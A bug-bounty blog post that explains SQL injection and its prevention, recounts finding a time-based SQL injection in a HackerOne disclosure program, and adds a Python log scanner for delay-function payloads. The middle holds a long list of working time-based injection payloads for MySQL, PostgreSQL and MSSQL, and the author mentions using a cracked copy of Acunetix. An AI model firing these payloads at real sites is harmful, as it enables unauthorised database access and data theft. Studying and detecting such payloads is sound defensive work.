Time Based For Hall of Fame in HackerOne

Hello everyone, welcome back to another Cyberhelper blog post, this time on one of the hottest topics in SQL injection: how to find a time-based SQL injection vulnerability on a website.

Let me explain SQL injection and how you can find it using manual techniques and automated tools.

What is SQL Injection?

SQL Injection (SQLi) is a security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It occurs when untrusted user input is incorrectly handled and directly embedded into SQL queries, allowing the attacker to modify the structure or logic of those queries.

How It Works:

A web application might use input from a user to build a SQL query. If this input is not properly sanitized or parameterized, an attacker can insert malicious SQL code that changes the intended behavior of the query.

Example (Vulnerable Code):

SELECT * FROM users WHERE username = 'admin' AND password = 'password';

If this query is built by directly inserting user input:

query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"

An attacker could input:

  • username: admin' --
  • password: anything

Resulting query:

SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything';

The -- starts a comment in SQL, so the rest of the query is ignored, and the attacker is logged in as 'admin' without knowing the password.

Risks of SQL Injection:

  • Authentication bypass
  • Data theft (credit cards, personal info, etc.)
  • Data manipulation (INSERT, UPDATE, DELETE)
  • Database destruction
  • Remote code execution (in some cases)
  • Persistent control over the server

How to Prevent SQL Injection:

  1. Use Prepared Statements (Parameterized Queries): this ensures user input is treated as data, not executable code. For example: cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password))
  2. Use ORM libraries (like SQLAlchemy and Hibernate) that abstract SQL queries.
  3. Input Validation and Escaping: ensure inputs conform to expected formats (e.g., emails, numbers).
  4. Least Privilege Principle: the database user the app connects with should have only the permissions it needs.
  5. Web Application Firewalls (WAF): detect and block SQLi patterns.

Summary:

SQL Injection is a critical vulnerability that can allow attackers to manipulate or access your database. Prevent it by using safe coding practices and parameterized queries.

How I found the time-based SQL injection.

So I got a private invitation on HackerOne in which I had only one domain to test for security vulnerabilities, and the program was not paid; it was a VDP, and in a VDP program researchers do not get any monetary reward for their findings.

The first thing I did was use manual techniques to look for SQL injection in parameters, but where and how did I get the parameters? For finding parameters I used the Arjun tool (https://github.com/s0md3v/Arjun). This tool gave me 100% working parameters. After testing all the parameters I didn't get anything.

So I just set SQL injection aside and moved on to finding more vulnerabilities. After some time, having found all the juicy bugs like Open Redirection and HTML Injection, I reported them and got some points.

But the story is not over; the main point comes here. I started automated scanning using the tool named Acunetix (Cracked Version).

I just saved the full URL and started the scan. After a few hours of scanning I got a high-severity alert about a vulnerability. After checking the alert for SQL injection, it turned out to be time-based SQL injection.

What is Time-Based SQL Injection?

Time-based SQL Injection is a type of Blind SQL Injection attack where the attacker determines whether a vulnerability exists and extracts information by measuring how long the database takes to respond to specially crafted queries.

What is “Blind” SQL Injection?

In a Blind SQL Injection, the application does not return error messages or data directly to the attacker. So instead of seeing the results, the attacker has to infer them indirectly, often by observing:

  • The page’s response time
  • The page’s content
  • The HTTP status code

I have a preloaded list of time-based SQL injection payloads:

1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND ‘%’=’

1’XOR(if(now()=sysdate(),sleep(5),0))OR’

0

1 or sleep(5)#

0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z

(select(0)from(select(sleep(5)))v)

email=test@gmail.com’ WAITFOR DELAY ‘0:0:5’–

email=test@gmail.com’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z

0’XOR(if(now()=sysdate(),sleep(5),0))XOR’Z

0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z

if(now()=sysdate(),sleep(5),0)

‘XOR(if(now()=sysdate(),sleep(5),0))XOR’

‘XOR(if(now()=sysdate(),sleep(5*1),0))OR’

0’|(IF((now())LIKE(sysdate()),SLEEP(1),0))|’Z

0’or(now()=sysdate()&&SLEEP(1))or’Z

if(now()=sysdate(),sleep(5),0)/”XOR(if(now()=sysdate(),sleep(5),0))OR”/

if(now()=sysdate(),sleep(5),0)/*’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0))OR”*/

if(now()=sysdate(),sleep(5),0)/’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0) and 5=5)”/

if(1=1,sleep(5),0)/*’XOR(if(1=1,sleep(5),0))OR'”XOR(if(1=1,sleep(5),0))OR”*/

if(1337=1337,exp(~(1)),0)/*’XOR(if(1337=1337,exp(~(1)),0))OR'”XOR(if(1337=1337,sleep(5),0))OR”*/

SLEEP(5)/*’ or SLEEP(5) or ‘” or SLEEP(5) or “*/

%2c(select%5*%5from%5(select(sleep(5)))a)

(select(0)from(select(sleep(5)))v)

(SELECT SLEEP(5))

‘%2b(select*from(select(sleep(5)))a)%2b’

(select*from(select(sleep(5)))a)

1’%2b(select*from(select(sleep(5)))a)%2b’

,(select * from (select(sleep(5)))a)

desc%2c(select*from(select(sleep(5)))a)

-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))

-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))

(SELECT * FROM (SELECT(SLEEP(5)))YYYY)

(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#

(SELECT * FROM (SELECT(SLEEP(5)))YYYY)–

‘+(select*from(select(sleep(5)))a)+’

(select(0)from(select(sleep(5)))v)%2f’+(select(0)from(select(sleep(5)))v)+'”

(select(0)from(select(sleep(5)))v)%2f*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*%2f

(select(0)from(select(sleep(5)))v)/*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*/

‘,”),/*test*/%26%26%09sLeEp(5)%09–

‘%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END–

pg_SLEEP(5)

pg_SLEEP(5)–

pg_SLEEP(5)#

or pg_SLEEP(5)

or pg_SLEEP(5)–

or pg_SLEEP(5)#

pg_sleep(5)–

1 or pg_sleep(5)–

” or pg_sleep(5)–

‘ or pg_sleep(5)–

1) or pg_sleep(5)–

“) or pg_sleep(5)–

‘) or pg_sleep(5)–

1)) or pg_sleep(5)–

“)) or pg_sleep(5)–

‘)) or pg_sleep(5)–

;waitfor delay ‘0:0:5’–

);waitfor delay ‘0:0:5’–

‘;waitfor delay ‘0:0:5’–

“;waitfor delay ‘0:0:5’–

‘);waitfor delay ‘0:0:5’–

“);waitfor delay ‘0:0:5’–

));waitfor delay ‘0:0:5’–

‘));waitfor delay ‘0:0:5’–

“));waitfor delay ‘0:0:5’–

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

‘;WAITFOR DELAY ‘0:0:30’–

Accept: “‘ or sleep(30)=”

Accept-Charset: “‘or sleep(6)='”

These are some time-based payloads.
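From the defender's side, the two signals this post relies on (a delay function in the input and a response that takes as long as the requested sleep) can be checked in access logs. This is an added example, not code from the post or from any tool mentioned in it; the log lines are constructed, and the log format (method, target, status, response time in ms) is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (not real traffic): method, request target, status, response ms.
SAMPLE_LOG = """\
GET /search?q=shoes 200 87
GET /search?q=1%27XOR(if(now()%3Dsysdate()%2Csleep(5)%2C0))XOR%27Z 200 5093
GET /item?id=5 200 64
GET /login?email=test%40gmail.com%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 500 5210
GET /search?q=how+to+sleep+better 200 92
GET /api?sort=desc%2C(select*from(select(sleep(10)))a) 200 10088
GET /item?id=1%20or%20pg_sleep(5)-- 200 5012
GET /about 200 41
"""

# Delay primitives behind the MySQL, PostgreSQL and MSSQL payload families listed above;
# extend this per DBMS in use. The call syntax is required, so the word "sleep" alone is fine.
DELAY_PATTERNS = re.compile(r"sleep\s*\(|pg_sleep\s*\(|waitfor\s+delay", re.IGNORECASE)
DELAY_THRESHOLD_MS = 3000  # a response this slow is suspicious even without a pattern hit

def normalize(query: str) -> str:
    """Undo repeated URL encoding, drop /* */ comments, collapse tabs/spaces, lowercase."""
    prev = None
    while prev != query:
        prev, query = query, unquote_plus(query)
    query = re.sub(r"/\*.*?\*/", "", query)
    return re.sub(r"\s+", " ", query).lower()

def scan_log(text: str) -> list:
    """Return one record per suspicious request with the reasons it was flagged."""
    findings = []
    for line in text.splitlines():
        _method, target, _status, ms = line.split()
        ms = int(ms)
        decoded = normalize(target.partition("?")[2])
        reasons = []
        if DELAY_PATTERNS.search(decoded):
            reasons.append("delay-function")
        if ms >= DELAY_THRESHOLD_MS:
            reasons.append("slow-response")
        if reasons:
            findings.append({"target": target, "ms": ms, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ms"], f["reasons"], f["target"])
```

A request that is only slow is worth a look but not proof; one that carries a delay function and also took about that long is the combination the scanner in this post reported.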

Acunetix reported the time-based injection with 100% confidence. I picked the URL and started testing it in Burp Suite to verify, and guess what, I got a confirmed time-based SQL injection. I reported it, and within a few hours of reporting they replied with Triage and fixed the bug in 2 days; I got a Hall of Fame.

Sometimes tools can also help you find good stuff.

Thanks for reading.
